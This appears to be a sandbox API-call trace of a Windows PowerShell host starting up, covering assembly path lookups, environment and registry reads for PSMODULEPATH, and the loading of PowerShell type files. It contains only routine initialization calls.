	[0261.683] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0261.683] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0261.686] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0261.686] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0261.686] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0261.686] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0261.941] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x324
	[0261.942] CoCreateGuid (in: pguid=0x20d810 | out: pguid=0x20d810*(Data1=0x6867622b, Data2=0xa534, Data3=0x4c16, Data4=([0]=0xa4, [1]=0xaa, [2]=0x54, [3]=0x49, [4]=0x6c, [5]=0x73, [6]=0x7c, [7]=0xd8))) returned 0x0
	[0262.156] CoTaskMemAlloc (cb=0x104) returned 0x4ae670
	[0262.156] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4ae670, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0262.156] CoTaskMemFree (pv=0x4ae670) 
	[0262.160] WinSqmIsOptedIn () returned 0x0
	[0262.161] CoTaskMemAlloc (cb=0x104) returned 0x4ae670
	[0262.161] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4ae670, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0262.161] CoTaskMemFree (pv=0x4ae670) 
	[0262.164] CoTaskMemAlloc (cb=0x104) returned 0x4ae670
	[0262.164] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4ae670, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0262.164] CoTaskMemFree (pv=0x4ae670) 
	[0262.165] CoTaskMemAlloc (cb=0x104) returned 0x4ae670
	[0262.165] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4ae670, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0262.165] CoTaskMemFree (pv=0x4ae670) 
	[0262.166] CoTaskMemAlloc (cb=0x104) returned 0x4ae670
	[0262.166] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4ae670, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0262.166] CoTaskMemFree (pv=0x4ae670) 
	[0262.167] CoTaskMemAlloc (cb=0x104) returned 0x4ae670
	[0262.167] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4ae670, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0262.167] CoTaskMemFree (pv=0x4ae670) 
	[0262.169] CoTaskMemAlloc (cb=0x104) returned 0x4ae670
	[0262.169] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4ae670, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0262.169] CoTaskMemFree (pv=0x4ae670) 
	[0262.170] CoTaskMemAlloc (cb=0x104) returned 0x4ae670
	[0262.170] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4ae670, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0262.170] CoTaskMemFree (pv=0x4ae670) 
	[0262.170] CoTaskMemAlloc (cb=0x104) returned 0x4ae670
	[0262.170] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4ae670, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0262.170] CoTaskMemFree (pv=0x4ae670) 
	[0262.173] CoTaskMemAlloc (cb=0x104) returned 0x4ae670
	[0262.173] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4ae670, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0262.173] CoTaskMemFree (pv=0x4ae670) 
	[0262.176] CoTaskMemAlloc (cb=0x104) returned 0x4ae670
	[0262.177] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4ae670, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0262.177] CoTaskMemFree (pv=0x4ae670) 
	[0262.177] CoTaskMemAlloc (cb=0x104) returned 0x4ae670
	[0262.177] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4ae670, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0262.177] CoTaskMemFree (pv=0x4ae670) 
	[0262.177] CoTaskMemAlloc (cb=0x104) returned 0x4ae670
	[0262.177] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4ae670, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0262.177] CoTaskMemFree (pv=0x4ae670) 
	[0265.441] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20cc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0265.441] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20cbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0265.441] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20cbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0265.442] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20cbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0266.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20cc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0266.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20cbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0266.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20cbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0266.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20cc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0266.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20cbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0266.060] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20cbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0266.060] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20cc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0266.060] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20cbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0266.060] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20cbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0266.061] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20cc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0266.061] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20cbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0266.061] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20cbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0266.063] CoTaskMemAlloc (cb=0x104) returned 0x4ae670
	[0266.063] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x4ae670, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33
	[0266.063] CoTaskMemFree (pv=0x4ae670) 
	[0266.064] CoTaskMemAlloc (cb=0xcc) returned 0x1b77b970
	[0266.064] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b77b970, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0266.064] CoTaskMemFree (pv=0x1b77b970) 
	[0266.064] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d388 | out: phkResult=0x20d388*=0x328) returned 0x0
	[0266.064] RegQueryValueExW (in: hKey=0x328, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x20d30c, lpData=0x0, lpcbData=0x20d308*=0x0 | out: lpType=0x20d30c*=0x2, lpData=0x0, lpcbData=0x20d308*=0x6c) returned 0x0
	[0266.064] CoTaskMemAlloc (cb=0x70) returned 0x446640
	[0266.065] RegQueryValueExW (in: hKey=0x328, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x20d2dc, lpData=0x446640, lpcbData=0x20d2d8*=0x6c | out: lpType=0x20d2dc*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x20d2d8*=0x6c) returned 0x0
	[0266.065] CoTaskMemFree (pv=0x446640) 
	[0266.065] CoTaskMemAlloc (cb=0xcc) returned 0x1b77b970
	[0266.065] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x1b77b970, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0266.065] CoTaskMemFree (pv=0x1b77b970) 
	[0266.065] CoTaskMemAlloc (cb=0xcc) returned 0x1b77b970
	[0266.065] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b77b970, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0266.065] CoTaskMemFree (pv=0x1b77b970) 
	[0266.068] RegCloseKey (hKey=0x328) returned 0x0
	[0266.068] CoTaskMemAlloc (cb=0xcc) returned 0x1b77b970
	[0266.068] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b77b970, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0266.068] CoTaskMemFree (pv=0x1b77b970) 
	[0266.068] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d388 | out: phkResult=0x20d388*=0x328) returned 0x0
	[0266.068] RegQueryValueExW (in: hKey=0x328, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x20d30c, lpData=0x0, lpcbData=0x20d308*=0x0 | out: lpType=0x20d30c*=0x0, lpData=0x0, lpcbData=0x20d308*=0x0) returned 0x2
	[0266.068] RegCloseKey (hKey=0x328) returned 0x0
	[0266.889] CoTaskMemAlloc (cb=0x20c) returned 0x496620
	[0266.889] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x496620 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0267.185] CoTaskMemFree (pv=0x496620) 
	[0267.185] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x20cf10, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0267.186] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1
	[0267.191] CoTaskMemAlloc (cb=0x104) returned 0x4ae670
	[0267.191] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4ae670, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0267.191] CoTaskMemFree (pv=0x4ae670) 
	[0267.192] CoTaskMemAlloc (cb=0x104) returned 0x4ae670
	[0267.193] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4ae670, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0267.193] CoTaskMemFree (pv=0x4ae670) 
	[0267.199] CoTaskMemAlloc (cb=0x104) returned 0x4ae670
	[0267.199] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4ae670, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0267.199] CoTaskMemFree (pv=0x4ae670) 
	[0267.199] CoTaskMemAlloc (cb=0x104) returned 0x4ae670
	[0267.200] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4ae670, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0267.200] CoTaskMemFree (pv=0x4ae670) 
	[0267.204] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d178 | out: phkResult=0x20d178*=0x330) returned 0x0
	[0267.205] RegQueryValueExW (in: hKey=0x330, lpValueName="path", lpReserved=0x0, lpType=0x20d18c, lpData=0x0, lpcbData=0x20d188*=0x0 | out: lpType=0x20d18c*=0x1, lpData=0x0, lpcbData=0x20d188*=0x74) returned 0x0
	[0267.206] RegQueryValueExW (in: hKey=0x330, lpValueName="path", lpReserved=0x0, lpType=0x20d0fc, lpData=0x0, lpcbData=0x20d0f8*=0x0 | out: lpType=0x20d0fc*=0x1, lpData=0x0, lpcbData=0x20d0f8*=0x74) returned 0x0
	[0267.206] CoTaskMemAlloc (cb=0x78) returned 0x446640
	[0267.206] RegQueryValueExW (in: hKey=0x330, lpValueName="path", lpReserved=0x0, lpType=0x20d0cc, lpData=0x446640, lpcbData=0x20d0c8*=0x74 | out: lpType=0x20d0cc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x20d0c8*=0x74) returned 0x0
	[0267.206] CoTaskMemFree (pv=0x446640) 
	[0267.206] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x20ce40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0267.206] SetErrorMode (uMode=0x1) returned 0x1
	[0267.206] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x20d050 | out: lpFileInformation=0x20d050*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0267.206] SetErrorMode (uMode=0x1) returned 0x1
	[0267.207] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x20ce40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0267.207] SetErrorMode (uMode=0x1) returned 0x1
	[0267.207] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x20d050 | out: lpFileInformation=0x20d050*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0267.208] SetErrorMode (uMode=0x1) returned 0x1
	[0267.210] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x20ce40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0267.210] SetErrorMode (uMode=0x1) returned 0x1
	[0267.210] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x20d050 | out: lpFileInformation=0x20d050*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0267.210] SetErrorMode (uMode=0x1) returned 0x1
	[0267.211] CoTaskMemAlloc (cb=0x104) returned 0x4ae670
	[0267.211] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4ae670, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0267.211] CoTaskMemFree (pv=0x4ae670) 
	[0267.212] CoTaskMemAlloc (cb=0x104) returned 0x4ae670
	[0267.212] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4ae670, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0267.212] CoTaskMemFree (pv=0x4ae670) 
	[0267.212] GetACP () returned 0x4e4
	[0267.218] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x20ca00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0267.218] SetErrorMode (uMode=0x1) returned 0x1
	[0267.219] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x334
	[0267.219] GetFileType (hFile=0x334) returned 0x1
	[0267.219] SetErrorMode (uMode=0x1) returned 0x1
	[0267.219] GetFileType (hFile=0x334) returned 0x1
	[0267.220] ReadFile (in: hFile=0x334, lpBuffer=0x2d08858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20cf88, lpOverlapped=0x0 | out: lpBuffer=0x2d08858*, lpNumberOfBytesRead=0x20cf88*=0x1000, lpOverlapped=0x0) returned 1
	[0267.222] ReadFile (in: hFile=0x334, lpBuffer=0x2d08858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20cf88, lpOverlapped=0x0 | out: lpBuffer=0x2d08858*, lpNumberOfBytesRead=0x20cf88*=0x1000, lpOverlapped=0x0) returned 1
	[0267.223] ReadFile (in: hFile=0x334, lpBuffer=0x2d08858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20cf88, lpOverlapped=0x0 | out: lpBuffer=0x2d08858*, lpNumberOfBytesRead=0x20cf88*=0x1000, lpOverlapped=0x0) returned 1
	[0267.223] ReadFile (in: hFile=0x334, lpBuffer=0x2d08858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20cf88, lpOverlapped=0x0 | out: lpBuffer=0x2d08858*, lpNumberOfBytesRead=0x20cf88*=0xcf3, lpOverlapped=0x0) returned 1
	[0267.223] ReadFile (in: hFile=0x334, lpBuffer=0x2d07cb3, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x20cf88, lpOverlapped=0x0 | out: lpBuffer=0x2d07cb3*, lpNumberOfBytesRead=0x20cf88*=0x0, lpOverlapped=0x0) returned 1
	[0267.223] ReadFile (in: hFile=0x334, lpBuffer=0x2d08858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20cf88, lpOverlapped=0x0 | out: lpBuffer=0x2d08858*, lpNumberOfBytesRead=0x20cf88*=0x0, lpOverlapped=0x0) returned 1
	[0267.226] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x20cca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0267.226] SetErrorMode (uMode=0x1) returned 0x1
	[0267.226] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x20cf00 | out: lpFileInformation=0x20cf00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0267.227] SetErrorMode (uMode=0x1) returned 0x1
	[0267.227] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x20cc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0267.228] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x20cfe8 | out: phkResult=0x20cfe8*=0x334) returned 0x0
